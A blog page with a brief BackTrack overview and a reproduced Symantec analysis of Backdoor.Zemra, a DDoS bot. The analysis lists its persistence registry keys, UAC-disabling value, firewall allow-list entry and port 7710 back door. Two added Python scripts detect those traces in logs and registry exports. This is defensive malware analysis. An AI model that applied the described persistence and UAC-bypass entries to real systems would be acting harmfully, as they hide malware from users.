BackTrack provides users with easy access to a comprehensive and large collection of security-related tools ranging from port scanners to password crackers. Support for Live CD and Live USB functionality allows users to boot BackTrack directly from portable media without requiring installation, though permanent installation to hard disk is also an option.
BackTrack includes many well known security tools including:
BackTrack arranges tools into 12 categories:
  • Information Gathering
  • Vulnerability Assessment
  • Exploitation Tools
  • Privilege Escalation
  • Maintaining Access
  • Reverse Engineering
  • RFID Tools
  • Stress testing
  • Forensics
  • Reporting Tools
  • Services
  • Miscellaneous


Date: Release
February 5, 2006: BackTrack v.1.0 Beta
May 26, 2006: The BackTrack project released its first non-beta version (1.0).
March 6, 2007: BackTrack 2 final released.
June 19, 2008: BackTrack 3 final released.
January 9, 2010: BackTrack 4 final release. (Linux kernel
May 8, 2010: BackTrack 4 R1 release
November 22, 2010: BackTrack 4 R2 release
May 10, 2011: BackTrack 5 release (Linux kernel 2.6.38)
August 18, 2011: BackTrack 5 R1 release (Linux kernel
March 1, 2012: BackTrack 5 R2 release (Linux kernel 3.2.6)
August 13, 2012: BackTrack 5 R3 release
As soon as newer versions of BackTrack are released, older versions lose their support and service from the BackTrack development team.


Sunday, 2 September 2012

The Zemra Bot – New DDoS Attack Pack

Summary :-

           June 26, 2012
June 26, 2012 2:47:51 PM
Systems Affected:
Windows 2000, Windows 7, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Server 2008, Windows Vista, Windows XP
Backdoor.Zemra is a Trojan horse that opens a back door and downloads more files onto the compromised computer.

Antivirus Protection Dates

  • Initial Rapid Release version pending
  • Latest Rapid Release version pending
  • Initial Daily Certified version pending
  • Latest Daily Certified version pending
  • Initial Weekly Certified release date June 27, 2012

Threat Assessment


  • Wild Level: Low
  • Number of Infections: 0 - 49
  • Number of Sites: 0 - 2
  • Geographical Distribution: Low
  • Threat Containment: Easy
  • Removal: Easy


  • Damage Level: Medium
  • Payload: Opens a back door. Downloads files.


  • Distribution Level: Low

“Zemra” is a new Distributed Denial of Service (DDoS) crimeware bot, detected by Symantec as Backdoor.Zemra. Lately, this threat has been observed performing denial-of-service attacks against organizations with the purpose of extortion. Zemra first appeared on underground forums in May 2012 at a cost of €100.
This crimeware pack is similar to other crime packs, such as Zeus and SpyEye, in that it has a command-and-control panel hosted on a remote server. This allows it to issue commands to compromised computers and act as the gateway to record the number of infections and bots at the attacker’s disposal.
Similar to other crimeware kits, the functionality of Zemra is extensive:
  • 256-bit DES encryption/decryption for communication between server and client
  • DDoS attacks
  • Device monitoring
  • Download and execution of binary files
  • Installation and persistence in checking to ensure infection
  • Propagation through USB
  • Self update
  • Self uninstall
  • System information collection
However, the main functionality is the ability to perform a DDoS attack on a remote target computer of the user’s choosing.
Initially, when a computer becomes infected, Backdoor.Zemra dials home through HTTP (port 80) and performs a POST request sending hardware ID, current user agent, privilege indication (administrator or not), and the version of the OS. This POST request gets parsed by gate.php, which splits out the information and stores it in an SQL database. It then keeps track of which compromised computers are online and ready to receive commands.
Inspection of the leaked code allowed us to identify two types of DDoS attacks that have been implemented into this bot:
  • HTTP flood
  • SYN flood
Symantec added detection for this threat under the name Backdoor.Zemra, which became active on June 25, 2012. To reduce the possibility of being infected by this Trojan, Symantec advises users to ensure that they are using the latest Symantec protection technologies with the latest antivirus definitions installed.

Technical Details :-

When the Trojan is executed, it creates the following files:
  • %UserProfile%\Application Data\wscntfy.exe
  • %Program Files%\Common Files\lsmass.exe

Next, it deletes the following files:
  • %Windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.212.730029
  • %Windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.740.735006
  • %Windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.740.734996
  • %Windir%\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.212.729999
  • %UserProfile%\Application Data\Microsoft\CLR Security Config\v2.0.50727.42\security.config.cch.212.730149
  • %UserProfile%\Application Data\Microsoft\CLR Security Config\v2.0.50727.42\security.config.cch.740.735197

The Trojan then modifies the following file:

Next, the Trojan creates the following registry entries so that it executes whenever Windows starts:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\"Windows-Network Component" = "%Program Files%\Common Files\lsmass.exe"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"Windows-Audio Driver" = "%UserProfile%\Application Data\wscntfy.exe"

It then creates the following registry entry to add itself to the list of applications authorized by the Windows firewall:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\"%UserProfile%\Application Data\wscntfy.exe" = "%UserProfile%\Application Data\wscntfy.exe:*:Enabled:Windows-Audio Driver"

It also creates the following registry entries:
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\"EnableLUA" = "0"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"Hidden" = "2"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\"EnableBalloonTips" = "0"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CLSID}\"IsInstalled" = "1"
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{CLSID}\"StubPath" = "%UserProfile%\Application Data\wscntfy.exe -r"

The Trojan creates the following mutex to ensure that only one copy of itself executes:

Next, the Trojan sends system information to a remote location, including:
  • Computer name
  • Language
  • OS version

It then opens a back door on TCP port 7710 to receive commands from the following remote command-and-control (C&C) server:

The Trojan then downloads files onto the compromised computer and saves them to the following locations:
  • %UserProfile%\Application Data\Microsoft\CryptnetUrlCache\MetaData\[THREAT FILE NAME]
  • %UserProfile%\Application Data\Microsoft\CryptnetUrlCahce\Content\[THREAT FILE NAME]
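
The HTTP check-in to gate.php and the TCP port 7710 back door described above both leave network traces. The following added example (not from Symantec or this blog) correlates the two signals per host; the log layouts, IP addresses and the 10.0.0.0/8 internal range are constructed assumptions.

```python
import posixpath
from urllib.parse import urlsplit

# Constructed sample lines; both log layouts are assumptions made for this example.
PROXY_LOG = """\
2012-06-27T10:01:02 10.0.0.5 POST http://203.0.113.10/panel/gate.php 200
2012-06-27T10:01:09 10.0.0.7 POST http://example.com/navigate.php?next=gate.php 200
2012-06-27T10:03:40 10.0.0.8 POST http://198.51.100.4/gate.php 200
2012-06-27T10:04:00 10.0.0.7 GET http://example.org/gate.php 404
"""
FLOW_LOG = """\
2012-06-27T10:02:10 TCP 10.0.0.5:49211 203.0.113.10:7710
2012-06-27T10:02:30 TCP 10.0.0.7:50111 192.0.2.8:443
2012-06-27T10:05:00 TCP 192.0.2.77:40022 10.0.0.9:7710
"""
INTERNAL_PREFIX = "10."   # assumption: monitored hosts live in 10.0.0.0/8
BACKDOOR_PORT = 7710      # TCP port named in the writeup


def checkin_hosts(proxy_log):
    """Clients that POST over plain HTTP to a URL whose file name is gate.php."""
    hosts = set()
    for line in proxy_log.splitlines():
        _ts, client, method, url, _status = line.split()
        parts = urlsplit(url)
        name = posixpath.basename(parts.path).lower()   # ignores the query string
        if method == "POST" and parts.scheme == "http" and name == "gate.php":
            hosts.add(client)
    return hosts


def backdoor_hosts(flow_log):
    """Internal hosts seen in a TCP flow where either end uses port 7710."""
    hosts = set()
    for line in flow_log.splitlines():
        _ts, proto, src, dst = line.split()
        ends = [end.rsplit(":", 1) for end in (src, dst)]
        if proto == "TCP" and any(int(port) == BACKDOOR_PORT for _ip, port in ends):
            hosts.update(ip for ip, _port in ends if ip.startswith(INTERNAL_PREFIX))
    return hosts


def triage(proxy_log, flow_log):
    """Return {host: 'high'} when both signals agree, else {host: 'review'}."""
    checkin, backdoor = checkin_hosts(proxy_log), backdoor_hosts(flow_log)
    return {h: "high" if h in checkin and h in backdoor else "review"
            for h in sorted(checkin | backdoor)}


if __name__ == "__main__":
    for host, level in triage(PROXY_LOG, FLOW_LOG).items():
        print(host, level)
```

A file name or port match on its own is weak evidence, which is why hosts with a single signal are only marked for review.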

Recommendations :-

Symantec Security Response encourages all users and administrators to adhere to the following basic security "best practices":
  • Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world.
  • Enforce a password policy. Complex passwords make it difficult to crack password files on compromised computers. This helps to prevent or limit damage when a computer is compromised.
  • Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application.
  • Disable AutoPlay to prevent the automatic launching of executable files on network and removable drives, and disconnect the drives when not required. If write access is not required, enable read-only mode if the option is available.
  • Turn off file sharing if not needed. If file sharing is required, use ACLs and password protection to limit access. Disable anonymous access to shared folders. Grant access only to user accounts with strong passwords to folders that must be shared.
  • Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have fewer avenues of attack.
  • If a threat exploits one or more network services, disable, or block access to, those services until a patch is applied.
  • Always keep your patch levels up-to-date, especially on computers that host public services and are accessible through the firewall, such as HTTP, FTP, mail, and DNS services.
  • Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files.
  • Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media.
  • Train employees not to open attachments unless they are expecting them. Also, do not execute software that is downloaded from the Internet unless it has been scanned for viruses. Simply visiting a compromised Web site can cause infection if certain browser vulnerabilities are not patched.
  • If Bluetooth is not required for mobile devices, it should be turned off. If you require its use, ensure that the device's visibility is set to "Hidden" so that it cannot be scanned by other Bluetooth devices. If device pairing must be used, ensure that all devices are set to "Unauthorized", requiring authorization for each connection request. Do not accept applications that are unsigned or sent from unknown sources.
How To Remove ?

Before proceeding further we recommend that you run a full system scan by using "Antivirus". If that does not resolve the problem you can try one of the options available below.

If you are a Norton product user, we recommend you try the following resources to remove this risk.

Removal Tool

  • Run Norton Power Eraser (NPE)
  • Norton Power Eraser did not remove this risk

If you have an infected Windows system file, you may need to replace it using the Windows installation CD.

How to reduce the risk of infection
The following resources provide further information and best practices to help reduce the risk of infection.
  • Operating system updates to fix vulnerabilities
  • File sharing protection
  • Disable Autorun (CD/USB)
  • Best practices for instant messaging
  • Best practices for browsing the Web
  • Best practices for email

If you are a Symantec business product user, we recommend you try the following resources to remove this risk.

Identifying and submitting suspect files
Submitting suspicious files to Symantec allows us to ensure that our protection capabilities keep up with the ever-changing threat landscape. Submitted files are analyzed by Symantec Security Response and, where necessary, updated definitions are immediately distributed through LiveUpdate™ to all Symantec end points. This ensures that other computers nearby are protected from attack. The following resources may help in identifying suspicious files for submission to Symantec.
  • Locate a sample of a threat
  • Submit a suspicious file to Symantec

Removal Tool
  • Run the Symantec Power Eraser with the Symantec Endpoint Protection Support Tool
  • Symantec Power Eraser Overview
  • Symantec Power Eraser User Guide

If you have an infected Windows system file, you may need to replace it using the Windows installation CD.

How to reduce the risk of infection
The following resource provides further information and best practices to help reduce the risk of infection.
Protecting your business network

The following instructions pertain to all current Symantec antivirus products.

1. Performing a full system scan with Antivirus

2. Restoring settings in the registry
Many risks make modifications to the registry, which could impact the functionality or performance of the compromised computer. While many of these modifications can be restored through various Windows components, it may be necessary to edit the registry. See the Technical Details section of this writeup for information about which registry keys were created or modified. Delete registry subkeys and entries created by the risk and return all modified registry entries to their previous values.
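
Before deleting anything, the registry entries listed under Technical Details can be checked against an exported copy of the registry. This is an added example, not Symantec's or this blog's code; it assumes the `reg export` output has already been decoded to text, and the sample export, user name and function names are constructed for illustration.

```python
import re

# Constructed sample: decoded text of a `reg export` (user name and SynTPEnh value are made up).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Windows-Audio Driver"="C:\\Documents and Settings\\alice\\Application Data\\wscntfy.exe"
"SynTPEnh"="C:\\Program Files\\Synaptics\\SynTP\\SynTPEnh.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"Windows-Network Component"="C:\\Program Files\\Common Files\\lsmass.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"EnableLUA"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
"C:\\Documents and Settings\\alice\\Application Data\\wscntfy.exe"="C:\\Documents and Settings\\alice\\Application Data\\wscntfy.exe:*:Enabled:Windows-Audio Driver"
'''

# Path tails from the writeup; matching the directory too avoids same-name false hits.
DROP_USER = r'\application data\wscntfy.exe'
DROP_PROG = r'\common files\lsmass.exe'

# (regex on key, value name or None for any, test on data, finding)
RULES = [
    (r'\\currentversion\\run$', 'windows-audio driver',
     lambda d: d.endswith(DROP_USER), 'Run autostart'),
    (r'\\policies\\explorer\\run$', 'windows-network component',
     lambda d: d.endswith(DROP_PROG), 'policy Run autostart'),
    (r'\\policies\\system$', 'enablelua',
     lambda d: d in ('0', 'dword:00000000'), 'UAC disabled'),
    (r'\\authorizedapplications\\list$', None,
     lambda d: DROP_USER + ':*:enabled:' in d, 'firewall allow-list entry'),
    (r'\\active setup\\installed components\\[^\\]+$', 'stubpath',
     lambda d: d.endswith(DROP_USER + ' -r'), 'Active Setup StubPath'),
]

def clean(text):
    """Strip surrounding quotes, undo .reg backslash escaping, lower-case."""
    if len(text) >= 2 and text[0] == text[-1] == '"':
        text = text[1:-1]
    return re.sub(r'\\(.)', r'\1', text).lower()

def parse_reg(text):
    """Yield (key, value_name, data) from decoded `reg export` text."""
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('[') and line.endswith(']'):
            key = line[1:-1].lower()
        elif key and (m := re.match(r'("(?:[^"\\]|\\.)*")=(.*)$', line)):
            yield key, clean(m.group(1)), clean(m.group(2))

def scan(text):
    """Return (finding, key, value_name) for every value that matches a rule."""
    return [(finding, key, name) for key, name, data in parse_reg(text)
            for key_re, want, test, finding in RULES
            if re.search(key_re, key) and want in (None, name) and test(data)]
```

Calling `scan()` on the export text returns one tuple per matching value, which gives a checklist of entries to remove or restore.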
